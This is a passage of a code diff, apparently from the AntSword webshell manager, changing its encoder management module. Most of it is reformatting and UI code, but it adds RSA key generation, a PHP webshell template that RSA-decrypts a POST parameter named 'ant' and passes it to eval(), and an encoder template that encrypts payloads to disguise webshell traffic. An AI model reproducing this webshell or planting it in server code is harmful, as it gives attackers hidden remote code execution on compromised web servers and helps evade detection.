toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${nValue}/encoder/${oename}.js`));
toastr.success(LANG['message']["retype_success"],LANG_T["success"]);
break
// type
if (nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
if (that._checkname(oename, nValue)) {
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${nValue}/encoder/${oename}.js`));
toastr.success(LANG['message']["retype_success"], LANG_T["success"]);
break
}
that.syncencoders();
}
});
grid.init();
that.grid = grid;
that.parseData();
}
// 创建新的编码器
createEncoder(t) {
createEncoder(id) {
let self = this;
let idArr = id.split('_');
let type = idArr[1];
let rsa = idArr.length >= 3 ? '_rsa' : '';
layer.prompt({
value: `myencoder`,
title: `<i class="fa fa-file-code-o"></i> ${LANG["prompt"]["create_encoder"]}`
},(value, i, e) => {
}, (value, i, e) => {
value = value.toLocaleLowerCase();
if(!value.match(/^[a-zA-Z0-9_]+$/)){
toastr.error(LANG["message"]["ename_invalid"],LANG_T['error']);
if (!value.match(/^[a-zA-Z0-9_]+$/)) {
toastr.error(LANG["message"]["ename_invalid"], LANG_T['error']);
return
}
if(self._checkname(value, t)){
toastr.error(LANG["message"]["ename_duplicate"] ,LANG_T['error']);
if (self._checkname(value, type)) {
toastr.error(LANG["message"]["ename_duplicate"], LANG_T['error']);
layer.close(i);
return
}
let savePath= path.join(remote.process.env.AS_WORKDIR,`antData/encoders/${t}/encoder/${value}.js`);
let savePath = path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${type}/encoder/${value}${rsa}.js`);
fs.writeFileSync(savePath, self.default_template);
fs.writeFileSync(savePath, rsa ? self.default_rsa_template : self.default_template);
var ids = self.grid.getAllRowIds();
let _id = 1;
if(ids.length > 0){
_id = parseInt(ids[ids.length-1]);
if (ids.length > 0) {
_id = parseInt(ids[ids.length - 1]);
}
_id ++;
self.grid.addRow(_id, `${_id},${antSword.noxss(value)},${t}`);
_id++;
self.grid.addRow(_id, `${_id},${antSword.noxss(value)},${type}`);
toastr.success(LANG["message"]["create_success"], LANG_T["success"]);
self.cell.progressOff();
layer.close(i);
......@@ -168,7 +190,7 @@ class Encoders {
let self = this;
// 获取选中ID列表
let ids = self.grid.getSelectedId();
if(!ids){
if (!ids) {
toastr.warning(LANG["message"]["edit_not_select"], LANG_T["warning"]);
return
}
......@@ -178,10 +200,9 @@ class Encoders {
return
}
let _id = _ids[0];
const ename = self.grid.getRowAttribute(_id, 'ename');
const epath = self.grid.getRowAttribute(_id, 'epath');
let buff = fs.readFileSync(epath+".js");
let buff = fs.readFileSync(epath + ".js");
let opt = {
title: `${LANG["edit_win_title"]}: ${ename}`,
width: 800,
......@@ -201,11 +222,11 @@ class Encoders {
if (id === 'save') {
// 保存代码
let saveData = editor.session.getValue();
if(!saveData){
toastr.warning(LANG["message"]["edit_null_value"],LANG_T["warning"]);
if (!saveData) {
toastr.warning(LANG["message"]["edit_null_value"], LANG_T["warning"]);
return
}
fs.writeFileSync(epath+".js", saveData);
fs.writeFileSync(epath + ".js", saveData);
toastr.success(LANG["message"]["edit_save_success"], LANG_T["success"]);
}
});
......@@ -245,50 +266,161 @@ class Encoders {
});
}
// 生成 RSA
generateRsaKey(bit = 1024) {
const key = new NodeRSA({ b: bit });
let pubKey = key.exportKey('pkcs8-public-pem');
let priKey = key.exportKey('pkcs1-private-pem');
let keyPath = this.rsa.keyPath;
fs.writeFileSync(keyPath.pub, pubKey);
fs.writeFileSync(keyPath.pri, priKey);
for (var _path in keyPath) {
if (!fs.existsSync(keyPath[_path])) {
toastr.error(LANG["message"]["rsa_save_error"], LANG_T["error"]);
return false;
}
}
toastr.success(LANG["message"]["rsa_save_success"], LANG_T["success"]);
this.reloadRsa();
return true;
}
// 重新读取 RSA
reloadRsa() {
let keyPath = this.rsa.keyPath;
let pubKey = fs.existsSync(keyPath.pub) ? fs.readFileSync(keyPath.pub) : '';
let priKey = fs.existsSync(keyPath.pri) ? fs.readFileSync(keyPath.pri) : '';
this.rsa.form.setItemValue('public_key', pubKey);
this.rsa.form.setItemValue('private_key', priKey);
this.rsa.form.setItemValue('php_code', `<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
${pubKey}
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);`);
}
// 编辑选中的编码器代码
rsaConfig() {
let self = this;
let opt = {
title: LANG["rsa_config_win_title"],
width: 800,
height: 600,
};
let _win = new WIN(opt);
_win.win.centerOnScreen();
let toolbar = _win.win.attachToolbar();
let form = _win.win.attachForm();
self.rsa.form = form;
toolbar.loadStruct([
{ id: 'generate', type: 'button', icon: 'repeat', text: LANG["toolbar"]['generate'] },
]);
toolbar.attachEvent('onClick', (id) => {
if (id === 'generate') {
if (fs.existsSync(self.rsa.keyPath.pub) && fs.existsSync(self.rsa.keyPath.pri)) {
layer.confirm(`${LANG['confirm']['generate']} `,
{
icon: 2,
shift: 6,
title: `${LANG['confirm']["generate"]} `,
}, (_) => {
layer.close(_);
self.generateRsaKey();
});
} else {
self.generateRsaKey();
}
}
});
form.loadStruct([
{
type: "settings",
labelWidth: 750,
inputWidth: 750,
position: "label-top",
labelLeft: 25,
inputLeft: 25
},
{
type: 'block',
inputWidth: 'auto',
offsetTop: 20,
list: [{
type: 'input',
label: LANG['form']['public_key'],
name: 'public_key',
rows: 6,
value: ''
}, {
type: 'input',
label: LANG['form']['private_key'],
name: 'private_key',
rows: 15,
value: ''
}, {
type: 'input',
label: LANG['form']['php_code'],
name: 'php_code',
rows: 20,
value: ''
}]
}], true);
self.reloadRsa();
}
deleteEncoder() {
let self = this;
// 获取选中ID列表
let ids = self.grid.getSelectedId();
if(!ids){
if (!ids) {
toastr.warning(LANG["message"]["delete_not_select"], LANG_T["warning"]);
return
}
let _ids = ids.split(",");
layer.confirm(`${LANG['confirm']['delete'](_ids.length==1?self.grid.getRowAttribute(_ids[0],"ename"): _ids.length)}`,
{
icon: 2,
shift: 6,
title: `<i class="fa fa-trash"></i> ${LANG["delete_title"]}`,
},(_)=>{
layer.close(_);
_ids.map((_id)=>{
var ename = self.grid.getRowAttribute(_id, 'ename');
var epath = self.grid.getRowAttribute(_id, 'epath');
fs.unlink(epath+".js");
layer.confirm(`${LANG['confirm']['delete'](_ids.length == 1 ? self.grid.getRowAttribute(_ids[0], "ename") : _ids.length)} `,
{
icon: 2,
shift: 6,
title: `${LANG["delete_title"]} `,
}, (_) => {
layer.close(_);
_ids.map((_id) => {
var epath = self.grid.getRowAttribute(_id, 'epath');
fs.unlinkSync(epath + ".js");
});
toastr.success(LANG["message"]["delete_success"], LANG_T["success"]);
self.syncencoders();
});
toastr.success(LANG["message"]["delete_success"], LANG_T["success"]);
self.syncencoders();
});
}
get default_template() {
return `/**
* php::base64编码器
* Create at: ${new Date().format("yyyy/MM/dd hh:mm:ss")}
*/
\'use strict\';
\'use strict\';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码为 PHP Base64 样例
// 生成一个随机变量名
let randomID = \`_0x\${Math.random().toString(16).substr(2)}\`;
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码为 PHP Base64 样例
// 生成一个随机变量名
let randomID = \`_0x\${Math.random().toString(16).substr(2)}\`;
// 原有的 payload 在 data['_']中
// 取出来之后,转为 base64 编码并放入 randomID key 下
data[randomID] = Buffer.from(data['_']).toString('base64');
......@@ -304,10 +436,36 @@ module.exports = (pwd, data) => {
return data;
}`;
}
get default_rsa_template() {
return `/**
* php::RSA编码器
* Create at: ${new Date().format("yyyy/MM/dd hh:mm:ss")}
*/
'use strict';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext) => {
let n = Math.ceil(data['_'].length / 80);
let l = Math.ceil(data['_'].length / n);
let r = []
for (var i = 0; n > i; i++) {
r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
}
data[pwd] = r.join("|");
delete data['_'];
return data;
}`;
}
// 检查 name 是否重复
_checkname(name,t) {
let tstr = ',' + antSword['encoders'][t].join(',')+',';
return tstr.indexOf(","+name+",")!=-1;
_checkname(name, t) {
let tstr = ',' + antSword['encoders'][t].join(',') + ',';
return tstr.indexOf("," + name + ",") != -1;
}
// 解析数据
parseData() {
......@@ -316,7 +474,7 @@ module.exports = (pwd, data) => {
let _id = 1;
Object.keys(self.encoders).map((t) => {
self.encoders[t].map( _ => {
self.encoders[t].map(_ => {
data.push({
id: _id,
ename: _,
......@@ -335,37 +493,37 @@ module.exports = (pwd, data) => {
self.grid.clearAll();
self.grid.parse({
'rows': data
}, 'json');
}, 'json');
}
// 同步到全局编码器
syncencoders() {
antSword['encoders'] = (function(){
var encoders = {asp:[],aspx:[],php:[],custom:[]};
var encoders_path = {asp:[],aspx:[],php:[],custom:[]};
let userencoder_path = path.join(remote.process.env.AS_WORKDIR,'antData/encoders');
antSword['encoders'] = (function () {
var encoders = { asp: [], aspx: [], php: [], custom: [] };
var encoders_path = { asp: [], aspx: [], php: [], custom: [] };
let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
// 初始化
!fs.existsSync(userencoder_path) ? fs.mkdirSync(userencoder_path) : null;
['asp','aspx','php','custom'].map((t)=>{
!fs.existsSync(path.join(userencoder_path, `${t}`))? fs.mkdirSync(path.join(userencoder_path, `${t}`)):null;
['asp', 'aspx', 'php', 'custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ? fs.mkdirSync(path.join(userencoder_path, `${t}`)) : null;
let t_path = path.join(userencoder_path, `${t}/encoder/`);
!fs.existsSync(t_path) ? fs.mkdirSync(t_path) : null;
let es = fs.readdirSync(t_path);
if(es){
es.map((_)=>{
if(!_.endsWith(".js")){
if (es) {
es.map((_) => {
if (!_.endsWith(".js")) {
return
}
encoders[t].push(_.slice(0,-3));
encoders_path[t].push(path.join(t_path, _.slice(0,-3)));
encoders[t].push(_.slice(0, -3));
encoders_path[t].push(path.join(t_path, _.slice(0, -3)));
});
}
antSword["core"][t].prototype.user_encoders = encoders_path[t];
});
return encoders;
})();
this.encoders=antSword["encoders"];
this.encoders = antSword["encoders"];
this.parseData();
}
}
......